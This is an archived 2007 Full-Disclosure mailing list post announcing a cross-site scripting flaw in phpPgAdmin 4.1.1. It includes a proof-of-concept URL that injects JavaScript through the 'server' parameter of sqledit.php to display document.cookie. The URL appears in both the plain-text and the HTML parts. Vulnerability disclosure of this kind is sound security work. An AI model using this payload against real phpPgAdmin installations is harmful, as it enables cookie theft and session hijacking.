[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] phpPgAdmin XSS Vulnerability
From:       "Michal Majchrowicz" <m.majchrowicz () gmail ! com>
Date:       2007-05-22 23:28:59
Message-ID: 3d3168e50705221628p1fb64076u6debf8a68c5901fc () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


There is a JavaScript code Injection in phpPgAdmin which fails to correctly
sanitize user supplied data. As a result very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as not logged user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
 Regards Michal Majchrowicz.
Hack.pl


[Attachment #5 (text/html)]

There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize \
user supplied data. As a result very simple XSS is possible. This was tested on \
phpPgAdmin 4.1.1 as not logged user.<br>PoC:<br><a \
href="https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.cookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//">
 https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.c \
ookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//</a><br>Regards \
Michal Majchrowicz.<br>Hack.pl<br>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic